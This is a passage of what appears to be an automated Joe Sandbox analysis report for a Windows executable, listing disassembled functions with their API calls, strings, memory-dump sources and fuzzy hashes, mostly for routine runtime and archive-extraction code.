                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3bdc9866c9a7675f4ea2941d9ba05592be0ee45092dfbeefe7cd3251491125a4
                                                            • Instruction ID: 9b28d639f62031893aeb74769f160ba54422d3e0c4f1c3cdbf7a9222515cf49a
                                                            • Opcode Fuzzy Hash: 3bdc9866c9a7675f4ea2941d9ba05592be0ee45092dfbeefe7cd3251491125a4
                                                            • Instruction Fuzzy Hash: EFA012A11585023C300412005C02C3F021CC6C0F12370CC3EFA11840816D480D490031
                                                            Function 0005F568 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 33940f74cebcd52b1da01433266c06610a4bba914b30062d1d18361722e0c3fb
                                                            • Instruction ID: bc8421ac03417a44d8a12080c7caddb964a92fbc82f6564906d79904bd7c7ae6
                                                            • Opcode Fuzzy Hash: 33940f74cebcd52b1da01433266c06610a4bba914b30062d1d18361722e0c3fb
                                                            • Instruction Fuzzy Hash: ACA012A115C5037C300412005C02C3F011CC6C0F123308C3AF912840816D4808490031
                                                            Function 0005F57C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 93dca4c92b5b66e2ebbe41b5328e949608ff2f86b4971da63675f0bdfd4519c1
                                                            • Instruction ID: bc8421ac03417a44d8a12080c7caddb964a92fbc82f6564906d79904bd7c7ae6
                                                            • Opcode Fuzzy Hash: 93dca4c92b5b66e2ebbe41b5328e949608ff2f86b4971da63675f0bdfd4519c1
                                                            • Instruction Fuzzy Hash: ACA012A115C5037C300412005C02C3F011CC6C0F123308C3AF912840816D4808490031
                                                            Function 0004B179 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,0004A061,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,0004920F,-00008E00), ref: 0004B17C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 05bbcefdfc3d89f4ebc5ff61fed5e2a95f20e359ffd36144db68b2c3440d54ad
                                                            • Instruction ID: df3e3fad131ea44c379f5e5e7cc517b6c04349d2336e8d7de143bffb1107d0be
                                                            • Opcode Fuzzy Hash: 05bbcefdfc3d89f4ebc5ff61fed5e2a95f20e359ffd36144db68b2c3440d54ad
                                                            • Instruction Fuzzy Hash: 4DA01230440009869D001730D90440C7710F7107C03000194500ACA061C72A44578A00

                                                            Non-executed Functions

                                                            Function 0005D2A0 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005D331
                                                            • EndDialog.USER32(?,00000006), ref: 0005D344
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0005D360
                                                            • SetFocus.USER32(00000000), ref: 0005D367
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005D3A1
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005D3D8
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0005D3EE
                                                              • Part of subcall function 0005BBFB: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC0F
                                                              • Part of subcall function 0005BBFB: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC20
                                                              • Part of subcall function 0005BBFB: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC2E
                                                              • Part of subcall function 0005BBFB: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC3C
                                                              • Part of subcall function 0005BBFB: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC57
                                                              • Part of subcall function 0005BBFB: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC7E
                                                              • Part of subcall function 0005BBFB: _swprintf.LIBCMT ref: 0005BCA4
                                                            • _swprintf.LIBCMT ref: 0005D437
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005D44A
                                                            • FindClose.KERNEL32(00000000), ref: 0005D451
                                                            • _swprintf.LIBCMT ref: 0005D4A0
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005D4B3
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005D4D0
                                                            • _swprintf.LIBCMT ref: 0005D503
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005D516
                                                            • _swprintf.LIBCMT ref: 0005D560
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005D573
                                                              • Part of subcall function 0005BFAF: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005BFD5
                                                              • Part of subcall function 0005BFAF: GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C024
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                            • String ID: %s %s$REPLACEFILEDLG
                                                            • API String ID: 3464475507-439456425
                                                            • Opcode ID: b73283d24f21d8d8e1d0fc991c54fb9744bdf64ffdb913106c6276eb74627afb
                                                            • Instruction ID: 5776599f30e2e8e5948bbc3f3634d2593244cd6ca545b17cc7f15cf1e3bba38c
                                                            • Opcode Fuzzy Hash: b73283d24f21d8d8e1d0fc991c54fb9744bdf64ffdb913106c6276eb74627afb
                                                            • Instruction Fuzzy Hash: 3C71A5B25447047BE3319B60DC49FFF77ECEB8A702F04042ABA49D6091D7759A088B63
                                                            Function 00047A8F Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00047A94
                                                            • _wcslen.LIBCMT ref: 00047AFD
                                                            • _wcslen.LIBCMT ref: 00047B6E
                                                              • Part of subcall function 000486E4: GetCurrentProcess.KERNEL32(00000020,?), ref: 000486F3
                                                              • Part of subcall function 000486E4: GetLastError.KERNEL32 ref: 00048739
                                                              • Part of subcall function 000486E4: CloseHandle.KERNEL32(?), ref: 00048748
                                                              • Part of subcall function 0004B450: DeleteFileW.KERNELBASE(?,00000000,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B461
                                                              • Part of subcall function 0004B450: DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B48F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047C23
                                                            • CloseHandle.KERNEL32(00000000), ref: 00047C3F
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047D8B
                                                              • Part of subcall function 0004B012: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047EB0,?,?,?,00000000), ref: 0004B02C
                                                              • Part of subcall function 0004B012: SetFileTime.KERNELBASE(?,?,?,?), ref: 0004B0E0
                                                              • Part of subcall function 0004A860: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0004A81B,?,?,?,?,?,0007365F,000000FF), ref: 0004A87B
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2821348736-3508440684
                                                            • Opcode ID: 45a1f348608f573c6fdde8686452bd852c7785790ad24f4407c424479876993e
                                                            • Instruction ID: 0cf831827d0a2eb8436adf57e85d047d286567f81a21c4b6b7d881bbd2188222
                                                            • Opcode Fuzzy Hash: 45a1f348608f573c6fdde8686452bd852c7785790ad24f4407c424479876993e
                                                            • Instruction Fuzzy Hash: 60C1B6B1D04249AAEB21DB64CC45FEEB3ACFF08304F04456AF549E7142DB74EA44CBA5
                                                            Function 0006E8FE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: bdc3c7e141e188fcadbe4dc8e3d525892f6a8c212b459d5cea044b1319a1481a
                                                            • Instruction ID: f364ddd6af7e22013c976f40b71e7e994d03c8e4aa7de085ce109afefc9f12e5
                                                            • Opcode Fuzzy Hash: bdc3c7e141e188fcadbe4dc8e3d525892f6a8c212b459d5cea044b1319a1481a
                                                            • Instruction Fuzzy Hash: 20C24872E086298FDB65CE28DD407EAB7F6EB44314F1441EAD84DE7241E779AE818F40
                                                            Function 00043943 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 4f4f70dfae8b1a95049c2d17f251dda876981a3b85aa33aa7575a2d63d3f1a96
                                                            • Instruction ID: 8b3e24d09ea985a77f0bb7098a3bb82e052ea3f0949d87d0277588ab46649eb0
                                                            • Opcode Fuzzy Hash: 4f4f70dfae8b1a95049c2d17f251dda876981a3b85aa33aa7575a2d63d3f1a96
                                                            • Instruction Fuzzy Hash: B942E3B16006849FDF24DF34C895BEA3BE5AF15300F444479FC4A8B287EB749A89CB65
                                                            Function 00042EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 799COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00042EBF
                                                            • _strlen.LIBCMT ref: 0004348B
                                                              • Part of subcall function 000515D9: __EH_prolog.LIBCMT ref: 000515DE
                                                              • Part of subcall function 00052EA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CEF8,00000000,?,?), ref: 00052EBE
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000435DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 0ccfc5e22a26f1888c5f217ad3d88c3c7c01df50ae4756c43aa48cb03c73cb86
                                                            • Instruction ID: c9507cd884cfba4a0417241893dd3a5d2e0c830d51c2db37d4b89b2feb59ba77
                                                            • Opcode Fuzzy Hash: 0ccfc5e22a26f1888c5f217ad3d88c3c7c01df50ae4756c43aa48cb03c73cb86
                                                            • Instruction Fuzzy Hash: 2C6238B16006848FDF29DF38C8956EA3BE1AF55304F08457EFC5A8B287DB749A49CB14
                                                            Function 0006085A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060866
                                                            • IsDebuggerPresent.KERNEL32 ref: 00060932
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00060952
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0006095C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: f9c804adc9186af125a543f7c1dd9a9514096ed3e1d702673b1f4b31e198eb43
                                                            • Instruction ID: 03e243546933e3387e976a0447f20573314c0cd1d1ff51f274d73d9715294484
                                                            • Opcode Fuzzy Hash: f9c804adc9186af125a543f7c1dd9a9514096ed3e1d702673b1f4b31e198eb43
                                                            • Instruction Fuzzy Hash: 8E313875D45318DBEB10EFA0DD897CDBBF8AF08301F1041AAE40CAB251EB759A848F55
                                                            Function 0005F67D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0005F5C2,0000001C,0005F7B7,00000000,?,?,?,?,?,?,?,0005F5C2,00000004,000A3D24,0005F847), ref: 0005F68E
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005F5C2,00000004,000A3D24,0005F847), ref: 0005F6A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 898f52654594e920efe01bd5aeeb51737c5e5dde3b6aba79519cd7f1ad744d54
                                                            • Instruction ID: 7ea83be2a13cdb747bb58b1db14b47650b048042b782d2c8ae4db391f4e7a4c2
                                                            • Opcode Fuzzy Hash: 898f52654594e920efe01bd5aeeb51737c5e5dde3b6aba79519cd7f1ad744d54
                                                            • Instruction Fuzzy Hash: EF01D476A00109ABDB14DE29DC05AEF7BE9EFC4325F0CC124ED59D6154D638D8458680
                                                            Function 00064E3F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00064F37
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00064F41
                                                            • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00064F4E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 63a5b2a0bbd4259396c6314027a9fe57d2eeec71c227d3d67567fb8f8d30ce17
                                                            • Instruction ID: 26c51506dfa10edb5f616410bd5aea9c28b95b0704163930fe68644af5075788
                                                            • Opcode Fuzzy Hash: 63a5b2a0bbd4259396c6314027a9fe57d2eeec71c227d3d67567fb8f8d30ce17
                                                            • Instruction Fuzzy Hash: 5631D274941228ABCB61DF64DC887CDBBB8BF18311F5046EAE81CA7251EB749F818F45
                                                            Function 0006C358 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 3b7b6c5231b1daf5a1643f0d8209d363313ee1d83982f28701b254241c043d7c
                                                            • Instruction ID: db50eb238782646940b35b02b84c11c18a2168a1239ae3b0b69501a685412ceb
                                                            • Opcode Fuzzy Hash: 3b7b6c5231b1daf5a1643f0d8209d363313ee1d83982f28701b254241c043d7c
                                                            • Instruction Fuzzy Hash: A83128719002596FEB64DE79CC84EFB7BBEDF85304F0441A8F499D7252EA309E448B50
                                                            Function 0006E450 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
                                                            • Instruction ID: 38ab963163621f8062c0ae8cf665e40023ad9e574a6ec009609188b97efcf0a9
                                                            • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
